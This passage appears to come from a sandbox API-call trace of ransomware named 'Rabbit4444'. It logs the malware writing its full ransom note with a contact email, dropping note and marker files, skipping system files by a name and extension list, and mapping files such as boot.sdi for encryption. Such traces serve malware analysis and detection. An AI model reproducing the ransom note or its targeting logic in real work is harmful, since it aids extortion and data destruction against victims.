Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0043.564] lstrlenA (lpString="{{ID}}") returned 6 [0043.564] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0043.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x115e80 [0043.564] CloseHandle (hObject=0x298) returned 1 [0043.564] GetLastError () returned 0x0 [0043.564] lstrlenW (lpString="Z:\\Recovery") returned 11 [0043.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0043.564] FindFirstFileW (in: lpFileName="Z:\\Recovery\\*", lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0xe2e9f84d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0043.564] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.564] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.564] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0043.564] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0043.564] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0xe2e9f84d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.564] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.564] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.565] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0043.565] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0043.565] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0043.565] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe2e9f84d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe2e9f84d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe2e9f84d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 1 [0043.565] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.565] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0043.565] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="Rabbit4444.exe") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2=".") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="..") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="windows") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="bootmgr") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="pagefile.sys") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="boot") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="ids.txt") returned 1 [0043.565] lstrcmpiW (lpString1="WindowsRE", lpString2="NTUSER.DAT") returned 1 [0043.565] lstrcpyW (in: lpString1=0x11ce938, lpString2="WindowsRE" | out: lpString1="WindowsRE") returned="WindowsRE" [0043.565] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE", dwFileAttributes=0x2012) returned 1 [0043.565] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6608 [0043.565] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2c) returned 0xf78b0 [0043.565] RtlInterlockedPushEntrySList (in: ListHead=0xf6390, ListEntry=0xf6610 | out: ListHead=0xf6390, ListEntry=0xf6610) returned 0x0 [0043.565] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 0 [0043.565] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0043.566] lstrcpyW (in: lpString1=0x11ce938, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0043.566] CreateFileW (lpFileName="Z:\\Recovery\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\recovery\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0043.566] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0043.566] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0043.567] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0043.567] CloseHandle (hObject=0x29c) returned 1 [0043.567] CloseHandle (hObject=0x298) returned 1 [0043.567] GetCurrentThreadId () returned 0x540 [0043.567] RtlInterlockedPopEntrySList (in: ListHead=0xf6390 | out: ListHead=0xf6390) returned 0xf6610 [0043.567] lstrcpynW (in: lpString1=0x11ce920, lpString2="Z:\\Recovery\\WindowsRE", iMaxLength=2048 | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0043.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf78b0 | out: hHeap=0xe0000) returned 1 [0043.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6608 | out: hHeap=0xe0000) returned 1 [0043.567] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery\\WindowsRE" | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0043.567] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="Z:\\Recovery\\WindowsRE\\") returned="Z:\\Recovery\\WindowsRE\\" [0043.567] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" [0043.567] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\windowsre\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0043.568] WriteFile (in: hFile=0x298, lpBuffer=0x11cd928*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11cc8e0, lpOverlapped=0x0 | out: lpBuffer=0x11cd928*, lpNumberOfBytesWritten=0x11cc8e0*=0x3d4, lpOverlapped=0x0) returned 1 [0043.571] FlushFileBuffers (hFile=0x298) returned 1 [0043.572] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0043.572] CloseHandle (hObject=0x298) returned 1 [0043.572] lstrlenW (lpString="Z:\\Recovery\\WindowsRE") returned 21 [0043.572] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0043.572] FindFirstFileW (in: lpFileName="Z:\\Recovery\\WindowsRE\\*", lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe34bb7bf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0043.572] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.572] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.572] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0043.572] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0043.572] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe34bb7bf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.572] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.572] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.572] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0043.572] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0043.572] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0043.572] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe34bb7bf, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe34bb7bf, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe34bb7bf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 1 [0043.572] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.572] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0043.572] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x21ce881b, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21ce881b, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x39762934, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="Rabbit4444.exe") returned -1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2=".") returned 1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="..") returned 1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="windows") returned -1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="bootmgr") returned -1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="pagefile.sys") returned -1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="boot") returned 1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="ids.txt") returned -1 [0043.573] lstrcmpiW (lpString1="boot.sdi", lpString2="NTUSER.DAT") returned -1 [0043.573] lstrcpyW (in: lpString1=0x11ce94c, lpString2="boot.sdi" | out: lpString1="boot.sdi") returned="boot.sdi" [0043.573] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\boot.sdi", dwFileAttributes=0x2002) returned 1 [0043.573] lstrlenW (lpString="boot.sdi") returned 8 [0043.573] lstrlenW (lpString="Rabbit4444") returned 10 [0043.573] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0043.573] lstrlenW (lpString=".dll") returned 4 [0043.573] lstrcmpiW (lpString1=".sdi", lpString2=".dll") returned 1 [0043.573] lstrlenW (lpString=".lnk") returned 4 [0043.573] lstrcmpiW (lpString1=".sdi", lpString2=".lnk") returned 1 [0043.573] lstrlenW (lpString=".ini") returned 4 [0043.573] lstrcmpiW (lpString1=".sdi", lpString2=".ini") returned 1 [0043.573] lstrlenW (lpString=".sys") returned 4 [0043.573] lstrcmpiW (lpString1=".sdi", lpString2=".sys") returned -1 [0043.573] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "z:\\recovery\\windowsre\\boot.sdi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0043.573] QueryPerformanceFrequency (in: lpFrequency=0x11cbda0 | out: lpFrequency=0x11cbda0*=100000000) returned 1 [0043.573] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbda8 | out: lpPerformanceCount=0x11cbda8*=13488426221) returned 1 [0043.574] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbe00 | out: lpFileSize=0x11cbe00*=3170304) returned 1 [0043.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0043.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0043.574] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x306300, lpName=0x0) returned 0x2a0 [0043.575] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x106300) returned 0x2c20000 [0043.687] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2d30000 [0043.839] UnmapViewOfFile (lpBaseAddress=0x2d30000) returned 1 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x119df0 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0044.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105480 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x119df0 [0044.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11a000 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11a210 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20c) returned 0x11a318 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b18 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0044.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a210 | out: hHeap=0xe0000) returned 1 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11a530 [0044.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b30 [0044.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0044.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x108bc8 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b30 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11a740 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0044.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0044.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: 